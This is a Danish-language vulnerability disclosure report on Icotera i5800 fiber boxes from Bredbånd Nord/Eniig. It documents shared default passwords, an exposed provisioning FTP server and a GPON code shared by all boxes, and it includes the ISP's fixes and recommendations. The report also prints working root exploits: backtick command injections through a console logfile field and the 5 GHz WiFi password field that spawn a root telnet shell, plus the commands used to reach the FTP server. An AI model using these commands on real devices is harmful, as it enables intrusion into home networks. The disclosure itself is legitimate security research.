Sikkerhedsproblemer i Icotera i5800 fiberboks fra Bredbånd Nord
Eksempel data:
- Kundenummer: 5963574 (7 tal, fortløbende)
- Kundekodeord: cuopeijuiy (10 tilfældige bogstaver)
- Alle andre brugernavne og kodeord er de samme på alle fiberbokse
Brugernavn/SSID | Kodeord | Kan ændres af kunden | Kan tilgås fra | |
---|---|---|---|---|
Mit Bredbånd Nord | 5963574 eller email | cuopeijuiy | Nej | Internettet |
WiFi | 5963574 | cuopeijuiy | Ja | 100m fra fiberboks |
Fiberbokses webinterface | admin operator |
admin operatorpass |
Ja Nej |
Routermode: MGMT, LAN Bridgemode: MGMT, VOIP |
Fiberbokses konsol | admin | 123 | Nej | MGMT, seriel port |
FTP server med fiberboks setup | voip | voip15739 | Nej | VOIP (skriveadgang) |
Koden til GPON er 1234567890 på alle fiberbokse. Dette blev nævnt i en email senere.
Sårbarhedsoversigt
Mit Bredbånd Nord: Opret bruger
For at oprette en bruger på selvbetjeningsportalen "Mit Bredbånd Nord" tilknyttes et kundenummer til en e-mail adresse. Hvis ikke kundenummeret har tilknyttet en e-mail adresse, kan dette gøres af enhver på Bredbånd Nords selvbetjeningsportal. Da kundenummeret også bliver benyttet som WiFi-SSID, er disse oplysninger offentligt tilgængelige. Herefter får man tilsendt kodeordet pr. mail, der kan bruges til "Mit Bredbånd Nord" og WiFi. Det er altså muligt at tilegne sig login oplysninger til naboens eller andet tilgængeligt WiFi, hvis de aldrig har benyttet selvbetjeningsportalen. Ofte er denne ikke benyttet, da nødvendige informationer som WiFi password og kundenummmer også modtages med udstyret fra Bredbånd Nord.
Mit Bredbånd Nord: Genbrugt kodeord
Da samme kodeord bruges til "Mit Bredbånd Nord" og WiFi. Vil enhver der har fået kodeordet til WiFi kunne gå ind på "Mit Bredbånd Nord" og ændre hastighed og TV pakke. Så børnene i hustanden kan ændre disse ting, såfremt man ikke har skiftet kodeordet til WiFi, inden man gav dem det.
Default kode på fiberbokses webinterface
Enhver der har adgang til LAN'et, kan ændre i fiberboksens konfiguration. For eksempel kan DNS-serverne ændres og dermed overvåge og kontrollere trafik. Selvom kunden ændrer passwordet på fiberboksen, er det stadig muligt at logge ind med operatør koden.
SSH og webinterface
Ved at route trafik ud igennem MGMT interfacet kan andre fiberbokse tilgås igennem SSH og webinterface. Koderne til WiFi og webinterfacet kan derefter læses, også selvom kunden har ændret dem. Hvis de ændrede koder er genbrugt på andre enheder, kan de misbruges yderligere. For eksempel hvis samme kode også benyttes til andre enheder i husstanden, eksempelvis WiFi/webinterfacet, IP-kamara mm.
Det at muligt at eksikvere kommandoer som root ved at indsætte 5Ghz WiFi koden som en `kommando` (altså man indsætter [`]-tegnet før og efter en selvvalgt kommando). Dette kan gøres både igennem web, SSH og konsol. Denne fejl blev ikke nævnt i dokumentet, da det ville gøre det for nemt at udnytte fejlene skulle dokumentet falde i de forkerte hænder, og for at var nemt at holde øje med om hullerne blev lukket, og ikke kun skjult. Fejlen blev rapporteret til Icotera i maj 2018. Icotera havde førsøgt at forhindre sådan en fejl, ved at lave en liste over ikke tilladte tegn. Men i denne liste var [´] forbudt i stedet for [`].
Tilladte: !"#$&/=?`+[]*,.:-_@ mellemrum, tal, store og små bogstaver Forbudte: ¤½§()´|{}^~¨'<>\;£
Kommandoen bliver eksekveret fordi at i filen /tmp/scripts/wlan_script bliver denne kommando kørt:
iwpriv wlan0 set_mib ssid=$'"wifinavnsatafbrugeren"' # Beskyttet i mod shell-injection iwpriv wlan0 set_mib passphrase=wifikodesatafbrugeren # Shell-injection mulig
Der er en lignende fejl i fiberbokse fra Alcatel. Men det er ikke undersøgt nærmere. En nem måde at teste for sådanne fejl, er at forsøge at kører denne kommando: "ping 192.168.0.2 -c 7", og se om man modtager 7 ping pakker på ens PC. Man skal selvfølgelig indsætte sin egen ip-adressen i kommandoen. Man kan forsøge at eksikvere kommandoen ved at indsætte den i alle inputfelter på webinterfacet. Typiske tegn man kan sætte før og efter kommandoen er: [`"';]. Man kan også forsøge $(kommando).
FTP-server med fiberboks setup
Ved at route LAN traffik ud igennem VOIP interfacet, kan andres fiberbokses konfigurationer tilgås på FTP-serveren, hvor de hentes fra under opstart. De indholder koden til WiFi og dermed "Mit Bredbånd Nord". Kontoen har læse- og skrive-rettigheder som en almindelig Linux bruger. Hele serveren er eksponeret igennem FTP. Man kan derfor ændre konfigurationsfilerne for alle fiberbokse, og se hvordan serveren der driver FTP servicen er sat op.
Fælles GPON kode
Når en fiberboks logger på GPON-netværket bruges serienummeret som brugernavn og koden 1234567890. Da serienummerene for fortløbende, er det muligt at gætte sig frem til et. Det er også nødvendigt at kende fiberboksens MAC-adresse. Denne bliver send ud via WiFi. Det er således muligt at overtage naboens internet-forbindelse. Dette er ikke testet, da der er risiko for driftsforstyrelser ved at gøre det.
Data og systemer der kan komprimtieres
- Fiberboks
- MAC-adresse
- Serienummer
- TR-069 kode
- Kundenummer
- WiFi kode
- Kundens egen kode til WiFi
- Kundens egen kode til webinterface
- DNS-server i fiberboks
- SSH host keys
- Firmware
- Mit Bredbånd Nord
- Navn
- Adresse
- Telefon
- Mobil
- Web TV Token
- Valg af abonnement
- "Anden betaler"
- "Anden postadresse"
- Kundens LAN og internet-forbindelse
- Alt ukrypteret traffik
- Alt krypteret traffik der er sårbar for "man in the middle" angreb, så som SSLstrip.
- Alle DNS opslag
- Alt beskyttet af dårlige/ingen kode, eller samme kode som til WiFi/route
- Alt med sikkerhedshuller.
- Fastnet-telefon
Kun fantasien sætter grænser for hvordan man kan udnytte sårbarhedserne...
Det mest oplagte er at bruge de 150.000 fiberbokse til at lave kryptovaluta. Hvis man antager at en boks kan generer 1 krone om dagen. Bliver det til 270 millioner kroner på 5 år. Ved at kombinere sikkerhedshullerne kan det gøres helt anonymt. Beløbet er sandsynligvis 10-100 gange mindre, men det er jo stadig ganske højt.
Det er også en mulighed at lægge internettet ned i hele Danmark, eller lave målrettet spionage.
Løsningsforslag
Brugernavn/SSID | Kodeord | Kan ændres af kunden | Kan tilgås fra | |
---|---|---|---|---|
Mit Bredbånd Nord | 5963574 eller email | vuisnrfh | Ja | Internettet |
WiFi | bbn-oixnfuvd | osmcydhycj | Ja | 100m fra fiberboks |
Fiberbokses webinterface | admin operator |
kseucnstf ofnvusht |
Ja Nej |
Routermode: LAN, MGMT (kun bestemt IP) Bridgemode: MGMT (kun bestemt IP) |
Fiberbokses konsol | admin | ofnvusht | Nej | MGMT (kun bestemt IP) |
FTP server med fiberboks setup | voip | voip15739 | Nej | VOIP (læseadgang) |
Resultat: (Ændringer med rød tekst)
Brugernavn/SSID | Kodeord | Kan ændres af kunden | Kan tilgås fra | |
---|---|---|---|---|
Mit Eniig | [kundenummer] [kundes email adresse] |
[internetkode] [selvvalgt kode] |
Nej Ja |
Internettet |
WiFi | [kundenummer] | [internetkode] | Ja | 100m fra fiberboks |
Fiberbokses webinterface | admin operator |
admin operatorpass |
Ja Nej |
MGMT, LAN |
Fiberbokses konsol | eniigadmin | [ukendt, samme på alle bokse] | Nej | MGMT, |
FTP server med fiberboks setup | [forskelling per PON] | [forskelling per PON] | Nej | VOIP (kun læse-adgang, ingen directory-listing, tilfældige filnavne) |
GPON | [Boks serie nummer] | 1234567890 | Nej | Hustande med fiber og ved gravsten |
Velkomstbrev: Når man får sin internetforbindelse skal man modtage et brev med koder til WiFi, webinterface og "Mit Bredbånd Nord". Det skal ikke være muligt at få disse oplysning ved at kende adresse og kundenummer.
"Mit Bredbånd Nord" er nu lukket, og erstattet med "Mit Eniig". Det er nu ikke længere muligt at få WiFi koden igennem en hjemmeside ved at kun at kende adresse og kundenummer (SSID). Men er det muligt at gører det igennem telefonsupport ved at kun at oplyse adresse.
Mit Bredbånd Nord: Det skal være muligt at skifte kodeordet, og det skal ikke være det samme som til WiFi.
Når man opretter en konto på "Mit Eniig" sætter man sin egen kode og bruger sin email som brugernavn. Det er stadig muligt at loggeind med kundenummer (SSID) og WiFi kode bagefter.
WiFi navn: Det skal ikke være det samme som kundenummeret. Det skal være unikt.
Dette er ikke ændret. Hvis man kun ændre en af tingene, er det vigtigste at ændre kundenummeret, da det er blevet offentliggjort ved at blive sendt ud som SSID.
WiFi kodeord: Det skal ikke være det samme som til "Mit Bredbånd Nord".
Kan stadig bruges til at oprettet en konto på "Mit Eniig".
Operator til SSH og webinterface: Et tilfældig password per fiberboks, således at det ikke er muligt at fiske password ud af ens egen fiberboks, og bruge det på andres.
Koden til SSH er skiftet, men den er ens alle fiberbokse. Det er derfor muligt at få koden til alle fiberbokse, ved at modificer SSH-demonen til at gemme koden under login, og lokke en systemadministrator til at logge ind.
Koderne admin:admin og operator:operatorpass er ikke skiftet på webinterfacet.
FTP server:
- Fjern skrive-adgang og directory listing.
- Opret hver konfiguration under et langt tilfældigt navn. Så man ikke kan gætte sig frem til navnet på andre konfigurationer.
- Begræns adgangen til kun /home/voip/.
Overvej en TFTP server, da den er bedre egnet til formålet.
Der er nu blevet lavet flere FTP-konti, der kun har adgang til en delmægte af konfigurationen. Directory listing og skrive-adgang er fjernet. konfigurationsfilerne har lange tilfældige navne. Logfilen bliver overvåget.
Firewalls: på MGMT og VOIP nettene skal trafik i mellem fiberbokse på samme net blokeres, f .eks. med private VLAN. Routeren for MGMT og VOIP nettene skal som udgangspunkt blokere udgånede forbindelse fra fiberbokse. På fiberboksen skal SSH og webinterfaces kun kunne tilgås fra bestemte IP'er.
Trafik på samme net bliver stadig ikke blokeret. Trafik til andre nets skal igennem en positivs liste for tilladt trafik. På denne liste har man glemt at tillade NTP serveren, og tiden passer derfor ikke længere på fiberboksene. Fiberboksens firewall tillade nu kun trafik for bestemte IP'er. Der er dog en konfigutionsfejl der gør at port 80 er åben for alle hvis fiberboksen er sat i bridge mode. Det blive dog reddet af et når fiberboksen kører i bridge, så kører webinterfacet ikke.
Logning: Fiberboksen understøtter at sende logs til en syslog-server. Slå det til, så man kan se om der bliver logget ind på fiberboksenes konsol.
# Eksempel på syslog: Jan 3 09:57:44 i5800 auth.info login[332]: root login on 'ttyS0' # Login via seriel port Jan 3 11:08:37 i5800 authpriv.notice dropbear[763]: Password auth succeeded for 'admin' from 10.232.3.104:9736 # Login via SSH
Logning er ikke blevet slået til. Loggen er meget omfatteene, og indeholde blandt andet hvornår de enkle enheder forbinder, og deres hostnavne.
Oprydning:
- Kode til WiFi og "Mit bredbånd Nord" skal skiftes.
- TR-069 koden skal skiftes.
- Kunder der har ændret koden til WiFi eller webinterfacet skal opfordres til at skiftes dem, og alle de steder de har brugt samme koder.
- Frisk firmware på fiberbokse installeres.
Ingen form for oprydning eller udmelding foretaget. Man satser på at ingen har udnyttet hullerne. Der er logfiler for FTP-serveren, som var det sværeste sikkerhedshul at finde. Men derudover er at ikke sikkert at Eniig har logs der kan vise om hullerne er udnytter eller ej. Er der for eksempel logs over når en supporter har udleveret en kode per telefon?
Dokumentation
I fiberboksen er der 2 telefonstik. Nummer 2 fungere også som seriel port, og tillader dermed at man kan logge ind på en fiberboks man har fysik adgang til. Det er i sig selv ikke et problem. Andre ISP'er tillader at man kan SSH til routeren de udlevere.
Fiberboksens netværk interfaces
>show interface wan ----------------------------------------------------------------- Name Oper IP type Address VLAN -------------------- ----- -------- ------------------- --------- MGMT (M) up DHCP 172.23.14.217/21 51 Internet up DHCP 100.91.213.132/20 13 # VLAN12 hvis global IP tilkøbt VOIP up DHCP 172.31.13.212/21 71 >show bridge brief ---------------------------------------------------------------- Name Config Oper IP type Address -------------------- -------- ----- -------- ------------------- br3 enable up DHCPD 192.168.0.1/24
Fiberboksens konfiguration
Herunder vises dele af konfigurationen fiberboksen kommer med.
interface wifi 1 ap 1 ssid 5963574 # Kundenummer interface wifi 1 ap 1 enckey wpa2 cuopeijuiy # Kundekodeord interface wifi 2 ap 1 ssid 5963574_5GHz # Kundenummer interface wifi 2 ap 1 enckey wpa2 cuopeijuiy # Kundekodeord management ssh listen management management ssh filter rule 1 inif any management ssh filter rule 1 srcip 0.0.0.0 # SSH kan tilgås af alle via MGMT interface management ssh filter rule 1 action allow management syslog disable # Syslog er slået fra management cli username admin management cli password $1$aKaa.d9.$6IzZ0e8gYlTf8gvpMxmfa0 # SSH passswordet er 123 management webif customer username admin management webif customer password admin management webif operator username operator management webif operator password operatorpass management webif listen all management webif filter rule 1 description allow MGMT access management webif filter rule 1 inif MGMT management webif filter rule 1 srcip 0.0.0.0 # Webinterface kan tilgås af alle via MGMT interface management webif filter rule 1 action allow management webif filter rule 2 description allow customer access management webif filter rule 2 inif br3 # Hvis fiberboksen er i bridgemode, eksistere "br3" ikke, og bliver til "any" i stedet for. Webinterface kan derfor også tilgås via VOIP interfacet management webif filter rule 2 srcip 0.0.0.0 management webif filter rule 2 action allow
Tilgå FTP server med alle fiberbokse setups
Find FTP password:
> debug techsupport # Ikke alt indhold vist. Søg efter "OMCI Provisioning". Jan 1 01:00:33 i5800 user.info syslog: OMCI Provisioning: Starting Jan 1 01:00:38 i5800 user.info syslog: OMCI Provisioning: Address: 89.249.14.88 Jan 1 01:00:38 i5800 user.info syslog: OMCI Provisioning: ftp Configuration filename: /home/voip/gistr01pon02/gistr01_1-4-113-A.xml Jan 1 01:00:38 i5800 user.info syslog: OMCI Provisioning: ftp Username: voip Jan 1 01:00:38 i5800 user.info syslog: OMCI Provisioning: ftp Password: voip15739
Route traffik til FTP server igennem VOIP interface:
router addif wan 3 router nat masquerade wan 3 enable router route 1 enable router route 1 destination 89.249.14.88 router route 1 gateway 172.31.0.1 # Default gateway for VOIP interfacet router route 1 interface wan 3 copy progress boot
Hvis man er forbundet til fiberboksenes LAN kan ftp://voip:voip15739@89.249.14.88/ nu tilgås.
lftp -u voip,voip15739 -e 'find /home/voip/;bye' 89.249.14.88 | grep xml | wc -l 151398 # Serveren indeholder konfigurationer for mere end 150.000 fiberbokse. Alle læse- og skrive-bare.
Der er omkring 2500 konfigurationer for Gistrup. Hvilket kan passe med at antenneforeningen har 1500 medlemmer og der er yderlig 1000 i området.
Root exploit fra konsollen
For at bliver root fra konsollen kør denne kommando:
gpon set logfile filename /tmp/log`sed "s/cliIcotera.//" -i /etc/passwd&sleep 999` # Tryk CTRL-c bagefter
Log ind igen, og du har en root-konsol.
Kommandoen virker fordi den ændrer shellen fra /bin/cliIcotera.sh til /bin/sh.
Root exploit fra webinterfacet
For at få en root terminal skal man sætte 5 Ghz WiFi koden til:
`/bin/nohup /bin/telnetd -l /bin/sh -p 59251 &` # Start telnet. `iptables -I INPUT -s 192.168.0.0/24 -j ACCEPT` # Tillad traffik. # Sæt koden tilbage til det den var før.
Telnet til routeren på port 59251.
Afsluttende bemærkninger
Disclaimer
De omtalte sikkerhedproblemer er fundet i forbindelse med en undersøgelse om hvordan fiberboksen virkede. Der er ikke blevet brugt sikkerheds-skannings programmer. Der er kun blevet tilgået fiberbokse efter aftale ejeren. En ondsindet person ville ikke havde de samme begrænsninger, og ville måske finde flere sikkerhedshuller.
Ros
- Det er ikke muligt at at få sin fiberboks til at få en andens konfiguration ved at fake sin MAC-adresse. Da fiberboksender logger ind med et individuelt brugernavn/kodeord for at kunne få URL'en til sin konfiguration. Hvor konfigurationen skal hentes fra oplyses via TR069. TR069 i sig selv er sikker. Placering af konfigurationen der henvises til var ikke.
- Koden til WiFi er nem at taste ind. Men koster 300.000 kroner at bruteforce. Udviklingen går hurtig, hvis koden ændres bør den vær på 12 tegn, for at være fremtidssikret.
- Det er ikke muligt fra VOIP interfacet at SSH til FTP serveren på port 22. Der var faktisk én firewall et sted.
Yderlig læsning
Forbedringsforslag til Eniig
Afskaf default og fælles koder
Problem: Der er 4 koder på fiberboksene der er ens på dem alle. Det er for: konsollen, GPON, og weinterfacets 2 konti: den til kunden og den til support. Der er lige nu ikke fundet nogen alvorlige huller ved dette, men det øger muligheden for at udnytte fremtidige huller.
Løsning Operator-kontoen til webinterfaces skal lukkes, eller have en unik koden per fiberboks. Bruger-kontoen skal have en unik koden per fiberboks. Det bør ikke være det samme som til WiFi, men det er bedre at bruge den, end den samme på alle fiberbokse. Koderne til GPON og konsol skal være forskellig per fiberboks.
Verificer konfiguration
Problem: Der er forskel på den konfiguration fiberboksen henter, og hvad den kørerne konfiguration bliver til.
For eksempel bliver disse kommandoer:
management webif operator enable management webif filter rule 2 inif br3
Til denne konfiguration:
management webif operator enable management webif operator username operator management webif operator password operatorpass management webif filter rule 2 inif any # Hvis br3 ikke eksistere
Løsning: Før automatisk kontrol med at den kørerne konfiguration bliver til det forventede.
Hent konfiguration via HTTPS
Problem: Det er muligt at aflyttet FTP URL'en til konfigurationen, ved at bryde fysik ind i GPON netværket, for eksempel ved en gravsten. Fordi fiberboksens konfiguration hentes via FTP som er en ukrypteret protokol og upload trafik over GPON er ukrypteret (fra husstand til central). Med FTP URL'en i hånden kan man hente offers konfiguration fra en anden fiberboks.
Løsning: Hent konfigurationen over HTTPS, og aflås gravsten + installer alarm.
Begræns adgang til koder
Problem: Det er nemt at udgive sig for en anden når man snakker med supporten. Det er fordi at der er svært, hvis ikke umuligt for en supporter for at verificer at hvem de snakker med. Specielt ikke når alle kundenumre er offentliggjort som SSID'er (trådløst-netværksnavn). Sikkerhed og god support er to modsætninger, en supporter der siger nej, vi ikke få gode anmeldelser.
Løsning: Det skal ikke være muligt for support at se koder for WiFi, fiberboks eller selvbetjening. Det skal kun være muligt at skifte dem. Når en kode, telefonnummer eller email skiftes, skal der automatisk sendes en SMS og email til kunden. Hvis at er telefon/email skiftes skal det selvfølgeligt sendes til den tidligere telefon/email.
På den måde er det ikke muligt for en supporter at give adgang til en kundes LAN for en hacker eller sig selv, uden at kunden opdager det.
Det skal selvfølgelig ikke være muligt for kunden/hackeren at få en ny kode til selvbetjening, også se WiFi og fiberboksens koden fra selvbetjening. Derfor skal det heller ikke være muligt at se disse koder fra selvbetjening, det skal kun være muligt at ændre dem. Hvis login til selvbetjening kun er muligt via NemID, er dette unødvendigt.
Åben adgang til NTP server
Problem: Routeren for fiberbokse blokere adgang til deres NTP-server. Tiden passer derfor ikke på fiberboksene, og gør deres log sværere at bruge.
Løsning: Åben for traffilen. Det er godt at routeren har en positiv-liste over tilladt traffik, og har lukket for alt andet.
WiFi-konsulent
Problem: Kvalitet af det arbejde WiFi-konsulenten udføre kunne være bedre. Kun signal-styrken bliver målt.
Løsning: Når WiFi-konsulenten skal finde den rigtige placering for fiberboksen, skal det ske ved at måle faktisk through-put, for eksempel med appen "Wi-Fi Sweetspot. Dørene skal være lukket imens.
IPv6
Problem: Der er ingen IPv6.
Løsning: Kom nu igang. Især når I bruger carrier grade NAT. Husk at lave DHCPv6 prefix delegation.
Reverse DNS
Problem: Der er ingen reserve DNS for globale IP'er.
Løsning: I det mindste er det ikke lavet forkert, da det kan give sløvere internet. Men det kunne være rat med muligheden for at selv at sætte sin reverse DNS på sin globale IP.
MAC-adresse for global IP
Problem: Når man skifter imellem router og bridemode, skal man venter på at DHCP reservation løber ud. Ved minder man er så snedig at bruge den samme mac-adresse som fiberboksen.
Løsning: DHCP reservation bør kunne styres fra selvbetjeningen, ligesom det er muligt for Stofa og Fullrate.
Mange fiberboks modeller
Problem: Tiden man skal bruge på at opdater udstyre og lave nye features, ganges op med antallet af forskellige modeller.
Løsning: Overvej værdien det giver at reducer antallet af forskellige fiberboks modeller.
Lav et service katalog
Problem: Der findes en del skjulte services som man ikke kan få kendskab til fra Eniigs officielle hjemmeside. Det er services som at man kan få en fiberboks sat i bridge mode, og at man kan få aktiveret alle ethernet portene i fiberboksen til LAN.
Løsning: Lav et service katalog med mulighederne, eller gør dem tilgængelige via selvbetjening.
Support forum for kunder der selv til terminer GPON
Problem: Der er mange der ønsker helt at slippe for at have en fiberboks, og selv terminer GPON. Der ydes ikke support over for disse kunder.
Løsning: Lav et forum hvis de kunder kan mødes og hjælpe hinanden. Jeres egne teknikker kan kikke med.
Forbedringsforslag til Icotera
GPL
Problem: Det er ikke muligt at downloade sourcekoden, som er under GPL. At er benyttes GPL software nævnes ikke i indpakning, på boksen eller i webinterfacet.
Løsning: Følg TP-link og Edimax eksempel. Udgiv hele build miljøet, så det er nemt at bygge ens egen firmware.
GPON serienummer
Problem: GPON serienummeret er ikke tilfældigt. Det er således meget nemt at gætte et andet serienummer.
Løsning: Fortæl kunderne at det er nødvendigt at have en unik GPON kode per CPE.
Provisioning via HTTPS
Problem: Provisioning er ikke muligt via HTTPS, det er kun muligt via ukrypteret protokoller som HTTP, FTP og TFTP. Det vil give at ekstra lag af sikkerhed at understøtte det.
Løsning: Kompiler wget med https support. Det fylde noget mere. Men der er masse af plads på enheden.
Default opsætning
Problem: Default opsætningen ikke sikker. Det kræver en indsat at huske ændre alle koder og sætte firewallen op.
Løsning: Gør login kun muligt via konsol i default opsætningen (når nej, den har I slået fra i panik).
Der er ingen guide til at lavet det sikkert
Problem: Manualen fortæller ikke hvordan man laver en god sikker opsætning.
Løsning: Lav nogle eksempler på det.
Connection-tracking
Problem: Det ser ud til at der nogen gange kan være problemer med at TCP-timeout kun er sat til 600 sekunder i stedet for 7440 i /ect/scripts/network. Specielt hvis man sætter en router bag ved fiberboksen, og sætter den i DMZ i fiberboksen.
Løsning: Hvad er formålet ved at kun at have den på 600? Sæt den til 7440.
Koder hashet med MD5
Problem: Koder til konsol login er hashet med md5. Hvilket betyder at teknikker der ser konfigurationen ikke opdager at en usikker kode er brugt. Samtidigt er det muligt at knække koden eller finde en anden der fungere i stedet for. Givet nok CPU kraft.
Løsning: Enten gem koden i klartekst eller i en sikker hash. MD5 er det dårligste valg.
Forbedringsforslag til Center for Cybersikkerhed
Dropboks via https over tor
Problem: Hvis man gerne vil overlevere information sikkert og anonymt. Så kræver det meget tid at sætte en email klient op der bruger kryptering og tor-netværket.
Løsning: Opret et hjemmeside der kan kontaktes via HTTPS igennem tor-netværket. På siden skal man kunne sende beskeder og filer til jer. Gør det eventuelt muligt at tjekke siden igen senere for svar.
Konklusion
Alle går ind for IT-sikkerhed, så længe det ikke koster ressourcer, forstyrre brugerne eller risiker at forstyrre driften. En anden ting er, at man som systemadministrator ikke kan se sit system udefra, på grund af den insider-viden man har. Man kan se sig blind på fejl ingen vil finde, og overse de mest oplagte fejl.
Formålet med denne rapport var at vise Eniig hvordan deres system så ud udefra, og give et motiv til at få fejlene rettet, også selv om det kostede ressourcer og risikerede at forstyrre driften og brugerne.
Det er lykkes et godt stykke af vejen. Hullerne i FTP-serven var næppe blevet så grundigt lukket, hvis informationen var blevet send til drift-afdelingen, i stedet for til en journalist. Sandsynligvis havde Eniig kun gjort det svære at finde FTP loginet.
Som det ser ud nu, er der ikke nogen måde at masse-overtage alle fiberboksene på. Men det er stadig muligt at lave målrettet angreb, for eksempel ved at lokke koder man ikke er berettiget til ud af supporten. Man kunne også ønske sig at der nogen steder var flere lag af sikkerhed, for eksempel imellem fiberbokse på same subnet. Der er stadig mange (4) koder der er ens på alle fiberbokse.
Kort version
- Sikkerheden hos Eniig Fiber er nu på niveau man kan forvente af en ISP.
- Icotera havde kun lavet én fejl: Sikkerhedshullet i webinterface. Det ville kun have givet adgang til ens egen fiberboks, havde Eniig sat udstyret korrekt op. Uden denne fejl var 3 af 4 veje ind i Eniigs stadig system mulige.
- Næsten alt Linux baseret elektronik har en konsol-port. Det er helt normalt at man kan få adgang til den. Det samme gælder netværks-udstyr generelt. Det er derfor man fysik sikre det, og hvis det ikke er muligt. Så forventer man at andre kan få adgang til det.
Anbefaling til ISP kunder med tekniske færdigheder
Uanset hvilken ISP man har, skal man være opmærksom på at hvis ISPen router dit LAN. Så har ISPen og alle der kan hacke ISPen adgang til dit LAN. Dette er specielt problematisk for folk har mange dimser tilsluttet som NAS, IP-cams og printere. Men ikke holder dem opdateret, eller bruger default eller samme kode på dem alle. Mængden er sådanne dimser (IOT) er kraftigt stigene, og de stoler typisk på et LANet er sikkert.
Anbefaling her fra, er at man som minimum skifter WiFi-koden på routeren udleveret af ISPen. Brug ikke samme kode andre steder, og sørg for den er kompleks nok til at den ikke kan gættes af en maskine (12 tilfældige små bogstaver er godt nok, og er nemt at indtaste på en mobilenhed). Skift også gerne koden til routeren selv, genbug ikke koden til WiFi eller noget andet.
Endnu bedre er det at selv at router sit LAN. Men så skal man selv sørger for at holder sin router opdateret, og skifte alle default koder. Husk at slå WiFi fra på routeren udlevet af ISPen. Allerbedst er det hvis man slet ikke bruger routeren udlevet af ISPen, ved at selv at terminer den forbindelse-teknologi der benyttes.
Anbefaling til ISP kunder uden tekniske færdigheder
Din internetudbyder (og alle der kan hacke dem) har adgang til dit hjemmenetværk. Det er ikke et problem for mobiltelefoner og tablets, der er lavet til at komme på fremmede netværk. Men det er et problem for mange dimser der regner dit hjemmenetværk for sikkeret. Specielt hvis de har følsomme oplysninger, hvilket printere, netværks-harddiske og overvågnings-kameraer typisk har. Du kan afhjælpe prolemmet ved at bruge din egen router, frem for den udlevet af din internetudbyder. Men der er stor risiko for at du gør problemet større, fordi du ikke sætter din router korrekt op.
Anbefaling til politikere
Når mange netværks-tilsluttet enheder er usikre på samme måde, gør det det nemt at masse-udnytte dem. Dette kan for eksempel bruges til at lægge internettet ned i hele Danmark, eller til målrettet spionage. Som det er nu, stoler vi som samfund blindt på at dem der sætter enheder op, laver en sikker opsætning, og holder dem opdateret. Det burde være sådan, at når man når over et vist antal enheder, så skal deres opsætning certificeres.
Borgere der opdager sikkerhedshuller har ingen motivation til at rapporter dem, udover deres egen moral. Tvært imod så risikere de at blive politianmeldt, eller miste deres arbejde. Lav en måde at fortæller om sikkedeshuller på, der beskytter anmelderes anonymitet, og frigør anmelderen for straffeansvar inden for rimelige grænser. Beløn indsatsen.
Bredbånd Nord (nu Eniig Fiber) modtog i september 2017 dette dokument. Kommentarer er indsat i august/september 2018, med blå baggrund.
Mange konklusioner er lavet ud af få målinger, som antager at alt er ens. Bredbånd Nord have 8 forskellige fiberbokse i 2017.
Koder, IP-adresser og andet er ændret for at undgå misbrug (for en sikkerhedskyld, det burde ikke være nødvendigt).